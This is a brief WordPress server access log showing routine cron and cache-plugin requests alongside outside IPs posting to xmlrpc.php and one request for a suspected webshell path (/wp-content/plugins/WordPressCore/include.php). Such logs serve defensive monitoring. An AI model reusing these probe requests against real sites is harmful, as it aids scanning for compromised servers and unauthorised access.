198.54.114.83 - - [31/Mar/2025:11:32:57 -0400] "POST /wp-cron.php?doing_wp_cron=1743435177.0020411014556884765625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://grimslut.com"
217.156.65.24 - - [31/Mar/2025:11:32:54 -0400] "POST /xmlrpc.php HTTP/1.1" 200 186 "https://grimslut.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67"
198.54.114.83 - - [31/Mar/2025:11:33:01 -0400] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=5700N7N7h0fmd9Gm4Bj2K4ZZyAF919XY&litespeed_type=imgoptm HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://grimslut.com"
198.54.114.83 - - [31/Mar/2025:11:46:05 -0400] "POST /wp-cron.php?doing_wp_cron=1743435965.5255670547485351562500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://grimslut.com"
5.253.60.4 - - [31/Mar/2025:11:46:03 -0400] "POST /xmlrpc.php HTTP/1.1" 200 186 "https://grimslut.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36"
198.54.114.83 - - [31/Mar/2025:11:46:06 -0400] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=8KYCm5HYy95zQ8eabcyuMwusTKe5Hgis&litespeed_type=imgoptm HTTP/1.1" 200 5 "-" "WordPress/6.7.2; https://grimslut.com"
198.54.114.83 - - [31/Mar/2025:11:59:26 -0400] "POST /wp-cron.php?doing_wp_cron=1743436765.8703908920288085937500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://grimslut.com"
198.54.120.17 - - [31/Mar/2025:11:59:23 -0400] "POST /xmlrpc.php HTTP/1.1" 200 186 "https://grimslut.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68"
198.54.114.83 - - [31/Mar/2025:11:59:26 -0400] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=uBro9VaLZLjmFEt8S4K91c9y2j9s8wH9&litespeed_type=imgoptm HTTP/1.1" 200 5 "-" "WordPress/6.7.2; https://grimslut.com"
198.54.114.83 - - [31/Mar/2025:11:59:51 -0400] "POST /wp-cron.php?doing_wp_cron=1743436791.2678101062774658203125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://grimslut.com"
198.54.114.83 - - [31/Mar/2025:11:59:52 -0400] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=2Eid8xYZZmjv8tWZb6Co3nwN4O8NMBsc&litespeed_type=imgoptm HTTP/1.1" 200 5 "-" "WordPress/6.7.2; https://grimslut.com"
51.89.68.103 - - [31/Mar/2025:11:59:50 -0400] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 404 10271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
